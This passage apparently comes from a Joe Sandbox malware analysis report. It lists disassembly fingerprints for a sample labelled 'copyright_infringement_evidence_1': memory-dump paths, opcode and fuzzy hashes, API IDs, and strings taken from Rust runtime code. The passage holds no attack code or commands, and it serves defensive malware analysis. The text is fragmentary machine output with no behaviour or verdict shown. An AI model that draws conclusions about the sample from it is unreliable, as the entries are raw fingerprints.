                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: assertion failed: !buf.is_empty()$assertion failed: buf.len() >= MAX_SIG_DIGITS$assertion failed: d.mant + d.plus < (1 << 61)$assertion failed: d.mant < (1 << 61)$assertion failed: d.mant > 0$assertion failed: d.mant.checked_add(d.plus).is_some()$assertion failed: d.mant.checked_sub(d.minus).is_some()$assertion failed: d.minus > 0$assertion failed: d.plus > 0$assertion failed: edelta >= 0library\core\src\num\diy_float.rs$assertion failed: noborrowassertion failed: digits < 40assertion failed: other > 0library\core\src\num\mod.rs
                                                                                                          • API String ID: 0-3083710647
                                                                                                          • Opcode ID: e0e27974249f169c5739f4811aed0b1ba084e2ff88835dbaa6bf0af48143048f
                                                                                                          • Instruction ID: aaea264aa4b33d3eaf460f80735747dd2bee3db9d04957291af0c74dcf25abec
                                                                                                          • Opcode Fuzzy Hash: e0e27974249f169c5739f4811aed0b1ba084e2ff88835dbaa6bf0af48143048f
                                                                                                          • Instruction Fuzzy Hash: CEA22262F1678686FB14EF61A8407F8A365EB44798F828032DE0D17BA4DF7CE655CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: Resetstream_iderror_codeUserLibraryRemote
                                                                                                          • API String ID: 2162964266-2519780602
                                                                                                          • Opcode ID: 1ac00a3d5c4fb03eaffd4bfd9deca1e36a5af2bcb167a5dfddd34c6257611be3
                                                                                                          • Instruction ID: e80a9ead9c91e74e78acc2bef2329ea96d377c98b7fe3bb418103ff91a607369
                                                                                                          • Opcode Fuzzy Hash: 1ac00a3d5c4fb03eaffd4bfd9deca1e36a5af2bcb167a5dfddd34c6257611be3
                                                                                                          • Instruction Fuzzy Hash: 9132F83260A75542F760EB21E4403AAB3A0FB88B94F958135EEDD07BA6DF7CD152CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: PrngProcess
                                                                                                          • String ID: arenegyl$modnarod$setybdet$uespemos
                                                                                                          • API String ID: 2076587149-66988881
                                                                                                          • Opcode ID: d84ead34568eed0d3949afd7509a5f45504e566d2a9d22e63c3fc5290c0f9204
                                                                                                          • Instruction ID: 62d830a309a3211e77c11467da74d6c2bef605ef9e38683a842feb82cfbcd302
                                                                                                          • Opcode Fuzzy Hash: d84ead34568eed0d3949afd7509a5f45504e566d2a9d22e63c3fc5290c0f9204
                                                                                                          • Instruction Fuzzy Hash: 1531E5E5B44B8003FF94E7E578753AB9122AB427D4FC0E431CE5DA7B1ADE2DE2528140
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFrequencyLastPerformanceQuery
                                                                                                          • String ID: called `Result::unwrap()` on an `Err` value$overflow when subtracting durations
                                                                                                          • API String ID: 3362413890-1633623230
                                                                                                          • Opcode ID: cb020548709e7a28a8c4c631d000ee5537f77089f410569bf37d9affaa92ac05
                                                                                                          • Instruction ID: 5282d7f72cedbc35d46dc93a27536eb9a4ab575cecf319bd8622760d5bd95624
                                                                                                          • Opcode Fuzzy Hash: cb020548709e7a28a8c4c631d000ee5537f77089f410569bf37d9affaa92ac05
                                                                                                          • Instruction Fuzzy Hash: 15515B21F1679246FB15EB2499007BDA771AF403A4FE79131DD0E03AA8DFBCA995CB10
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                          • String ID:
                                                                                                          • API String ID: 2933794660-0
                                                                                                          • Opcode ID: 5466eb02025112198a7f7190dced38e4952106bda4a6e7595130ea47b1015ddb
                                                                                                          • Instruction ID: 8e8fe0afb9a5fcc1490e4ec7a3534bc56d78ed07e94173051652d15846ec09f7
                                                                                                          • Opcode Fuzzy Hash: 5466eb02025112198a7f7190dced38e4952106bda4a6e7595130ea47b1015ddb
                                                                                                          • Instruction Fuzzy Hash: 2B115E22B16F018AFB00DF61E8442B873A4FB18768F850E35DA2D42BB8DFB8D164C750
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: arenegyl$modnarod$setybdet$uespemos
                                                                                                          • API String ID: 0-66988881
                                                                                                          • Opcode ID: e8551324230822ba25d3ade8817082fee3629fa87e186f1c4ceabc4e3cd66531
                                                                                                          • Instruction ID: a161dee834b245b16270ff1d5e85d9905b88bb3d874d0c7569a86841aed0751a
                                                                                                          • Opcode Fuzzy Hash: e8551324230822ba25d3ade8817082fee3629fa87e186f1c4ceabc4e3cd66531
                                                                                                          • Instruction Fuzzy Hash: 2421F6E6B18B8442FE44DBE5787236B9262A3443C0F90E036EE4D9BB1EDF3DD2124640
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Authenti$GenuineI$HygonGen
                                                                                                          • API String ID: 0-696657513
                                                                                                          • Opcode ID: 99fcf8f9f8fe4493af883fad2e572ee65794893bc53a63a40713242abcfe6938
                                                                                                          • Instruction ID: ca04573d5583079b10c39a23db0adb43b90f897fcd4af54e8923cfe6af7a5889
                                                                                                          • Opcode Fuzzy Hash: 99fcf8f9f8fe4493af883fad2e572ee65794893bc53a63a40713242abcfe6938
                                                                                                          • Instruction Fuzzy Hash: 60917CA3B26A5106FB4C8565BC32BBA4892B3587D8F49A03DED5F97BC5DDBCC9118300
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CancelErrorFileStatus
                                                                                                          • String ID:
                                                                                                          • API String ID: 1267829034-0
                                                                                                          • Opcode ID: 411d82ea2e3cfe7d6f5a6dcfb3f970bafd40f61baf88b989056adbd240b76584
                                                                                                          • Instruction ID: 85c7306d50364f17ff6c5583302e4a3b169afe7c312236d6467f86bcaab05566
                                                                                                          • Opcode Fuzzy Hash: 411d82ea2e3cfe7d6f5a6dcfb3f970bafd40f61baf88b989056adbd240b76584
                                                                                                          • Instruction Fuzzy Hash: 73210062B0928181FF20AA15D44437DA791EB54FE8F6A4072CE4C477B0CFBDD8D68B50
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: 8ad03d0d50f2a4f348fcb43c2a58ace39f2635de61d5ca68ea03db7ddb3e06d3
                                                                                                          • Instruction ID: b5b5c9396492ac37964f762fa249559cebfa7e480b84fe7fb495d543e019b231
                                                                                                          • Opcode Fuzzy Hash: 8ad03d0d50f2a4f348fcb43c2a58ace39f2635de61d5ca68ea03db7ddb3e06d3
                                                                                                          • Instruction Fuzzy Hash: A3122473A1AB8582EB119B1DD404569AB68FB89BF4B469335DEAC077E1EF3CC191C300
                                                                                                          APIs
                                                                                                          • memset.VCRUNTIME140(?,?,?,?,?,?,00007FF7A18271FF,?,?,?,?,?), ref: 00007FF7A18D159D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID:
                                                                                                          • API String ID: 2221118986-0
                                                                                                          • Opcode ID: c9f656a241c2be940f7ee23180f370de22c39eb16d83576c6eebaad096a5cc2d
                                                                                                          • Instruction ID: b1c846952e5f90e51a4976a8822c624a2558e93494f7574e4dc671e15db7b945
                                                                                                          • Opcode Fuzzy Hash: c9f656a241c2be940f7ee23180f370de22c39eb16d83576c6eebaad096a5cc2d
                                                                                                          • Instruction Fuzzy Hash: F412562360E3E48AE3438B38441146E6F6597427E6B5F83A2EFD6133D6E678C524E371
                                                                                                          APIs
                                                                                                          • memmove.VCRUNTIME140(?,?,?,?,00007FF7A1980157,?,?,00000000,00000000,?,00007FF7A17CE0A5), ref: 00007FF7A18CE747
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: d0002b13c09d5d690a1573dc1393f3e0efa8bb161905e14b2604db6f059e8508
                                                                                                          • Instruction ID: 160f632e03ccb188c5f6b9031bab4992f3bb18a47b71574df1b5b6db21e58fa2
                                                                                                          • Opcode Fuzzy Hash: d0002b13c09d5d690a1573dc1393f3e0efa8bb161905e14b2604db6f059e8508
                                                                                                          • Instruction Fuzzy Hash: 40123523A2BB8582EB11AB199404569AB64FB95BF4F968735DEAD033E1EF7CC151C300
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID:
                                                                                                          • API String ID: 2162964266-0
                                                                                                          • Opcode ID: 49f605c08f3ad2b326d26e75afb1b711dc5805d98f971d0db6d8500d22642dfd
                                                                                                          • Instruction ID: e7d7987411d944674f6e56f8e60e09525c9c7538cd133b055644caa9f36d1698
                                                                                                          • Opcode Fuzzy Hash: 49f605c08f3ad2b326d26e75afb1b711dc5805d98f971d0db6d8500d22642dfd
                                                                                                          • Instruction Fuzzy Hash: 45024323A1ABC582FB119B28A0045B9AB60FB95BE0F865335EFAD13791EF7CD151C710
                                                                                                          APIs
                                                                                                          • memset.VCRUNTIME140(00000000,?,?,?,?,?,00007FF7A17CE3B3,?,?,?,?,00007FF7A17CCE64), ref: 00007FF7A18CFC1E
                                                                                                          • memmove.VCRUNTIME140(00000000,?,?,?,?,?,00007FF7A17CE3B3,?,?,?,?,00007FF7A17CCE64), ref: 00007FF7A18CFE59
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmovememset
                                                                                                          • String ID:
                                                                                                          • API String ID: 1288253900-0
                                                                                                          • Opcode ID: 52142bb4d3ceafec992963544e61837211ab85690b3ec1f7c317f6f60d2cb8e9
                                                                                                          • Instruction ID: 5a73165aa33e81ccb60ddf71dd0ad6aef183a64ea281ee20d03ae348ab02dc69
                                                                                                          • Opcode Fuzzy Hash: 52142bb4d3ceafec992963544e61837211ab85690b3ec1f7c317f6f60d2cb8e9
                                                                                                          • Instruction Fuzzy Hash: 4BD16663F16B9582FB129F2998011A9A711BB45BF8F858331DF791B3D4EB7CC5A1C210
                                                                                                          Strings
                                                                                                          • internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\httparse-1.9.4\src\simd\swar.rs, xrefs: 00007FF7A1832CFA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: internal error: entered unreachable codeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\httparse-1.9.4\src\simd\swar.rs
                                                                                                          • API String ID: 0-725632306
                                                                                                          • Opcode ID: 5353a8450bea93c64333069a7fd88b8167fd71b1b21ca1863704310e6e2fcc3d
                                                                                                          • Instruction ID: a01a6775471bd5705b1cc1a2c3082c6f945bcc2742a633d534c9515cf3dc3638
                                                                                                          • Opcode Fuzzy Hash: 5353a8450bea93c64333069a7fd88b8167fd71b1b21ca1863704310e6e2fcc3d
                                                                                                          • Instruction Fuzzy Hash: 1F323A21A0E2D281F77DAB159400738AB9AAB017A4F9F45B1D9AD033F0CEFCD561DB21
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 00000000
                                                                                                          • API String ID: 0-3221785859
                                                                                                          • Opcode ID: 173f58b4aaf061a86f0dc1375872fe5616d8a580eaf48c59b08ceae3ef6a0135
                                                                                                          • Instruction ID: a9d4ad32d93e197df101b6e0cc5d759da8ad768876a93c8a7627c97c0a8a253b
                                                                                                          • Opcode Fuzzy Hash: 173f58b4aaf061a86f0dc1375872fe5616d8a580eaf48c59b08ceae3ef6a0135
                                                                                                          • Instruction Fuzzy Hash: 92D19D61F0A79289FB25DA25E4003F5A693AB403A4F8592F2DD0E07BB4DFBCD566C710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memcmp
                                                                                                          • String ID:
                                                                                                          • API String ID: 1475443563-0
                                                                                                          • Opcode ID: 4ac2240c971035ff67e135182ced8062ddc35d4ff9abd5b8b255212468b7fa5c
                                                                                                          • Instruction ID: 5138b1decc9d62008d3a9959a93540f8d5092a669077b42618c890b242a51c52
                                                                                                          • Opcode Fuzzy Hash: 4ac2240c971035ff67e135182ced8062ddc35d4ff9abd5b8b255212468b7fa5c
                                                                                                          • Instruction Fuzzy Hash: 89C15A32B6A7B142FB90DB219814BB9A651B7127A0FC28570DE0E43BD0DFBCE561DB10
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
